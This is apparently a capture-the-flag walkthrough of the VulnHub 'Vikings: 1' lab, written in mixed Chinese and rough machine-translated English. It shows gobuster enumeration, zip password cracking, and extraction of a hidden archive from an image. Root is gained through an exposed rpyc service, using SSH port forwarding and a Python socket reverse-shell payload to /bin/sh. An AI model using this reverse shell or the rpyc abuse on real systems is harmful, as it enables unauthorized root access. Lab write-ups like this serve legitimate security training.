VIKINGS: 1 vulnhub walkthrough

虚拟机地址 : https://www.vulnhub.com/entry/vikings-1,741/

infomation

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

访问web.

对目录sitePerform directory and file blasting,发现了war.txt.

*  vikings gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.94.129/site -x txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.94.129/site
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2021/09/16 03:06:43 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://192.168.94.129/site/images/]
/css                  (Status: 301) [Size: 319] [--> http://192.168.94.129/site/css/]   
/js                   (Status: 301) [Size: 318] [--> http://192.168.94.129/site/js/]                                              
/war.txt              (Status: 200) [Size: 13]          

The file points to another directory/war-is-over,进入下载index.html,这是一段base64加密,查看二进制,发现是zip文档.

这是一个加密zip文档,使用john解密（The decryption process can be used by Baidu itselfjohn解密zip）,使用rockyou.txtGet the password as a dictionaryragnarok123.解压得到文件king,使用binwalk查看,Found one more in the filezip文档.

*  vikings binwalk king

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, big-endian, offset of first image directory: 8
1429567       0x15D03F        Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user
1429740       0x15D0EC        End of Zip archive, footer length: 22

使用dd得到含有user的zip文档,So as to get the first username and passwordfloki/[email protected].

*  vikings cat user 
//[email protected]                                     
//[email protected]

提权

ssh登录用户floki,查看端口情况,Port found18812开放,At the same time in the processrpyc是以root用户运行的,So we use this process to escalate privileges,需要注意的是The server does not allow outbound ports,Therefore, it is not possible to directly bounce the port to obtain itshell的,这里采用ssh进行本地端口转发（转发18812port to the attacking machine）and remote port forwarding（Forward the listening port of the attacking machine to the target machine）.

[email protected]:~$ ss -tnlp
State       Recv-Q        Send-Q                Local Address:Port                Peer Address:Port       
LISTEN      0             128                       127.0.0.1:45935                    0.0.0.0:*          
LISTEN      0             128                         0.0.0.0:80                       0.0.0.0:*          
LISTEN      0             128                   127.0.0.53%lo:53                       0.0.0.0:*          
LISTEN      0             128                         0.0.0.0:22                       0.0.0.0:*          
LISTEN      0             128                       127.0.0.1:18812                    0.0.0.0:*          
LISTEN      0             128                       127.0.0.1:8000                     0.0.0.0:* 
[email protected]:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1087  0.0  2.2 209144 22376 ?        Sl   14:14   0:04 python3 /usr/local/bin/rpyc_classic.py

The attack aircraft will target the host18812端口转发到本地

ssh -CfNg -L 18812:127.0.0.1:18812 [email protected]

Attack aircraft will be local8000Port forwarding to the target host8000端口.

ssh -CfNg -R 8000:192.168.94.128:8000 [email protected]

Then execute the following on the attack aircraftpython代码（Local installation is requiredrpyc库）.

#!/usr/bin/python3
#主要是利用server执行executemethod reboundshell到本地的8000端口
import rpyc

conn = rpyc.classic.connect("localhost")
f = conn.execute('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')
conn.close()

成功获取root权限.

*  ~ rlwrap nc -lvp 8000
listening on [any] 8000 ...
192.168.94.128: inverse host lookup failed: Host name lookup failure
connect to [192.168.94.128] from (UNKNOWN) [192.168.94.128] 53968
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
f0b98d4387ff6da77317e582da98bf31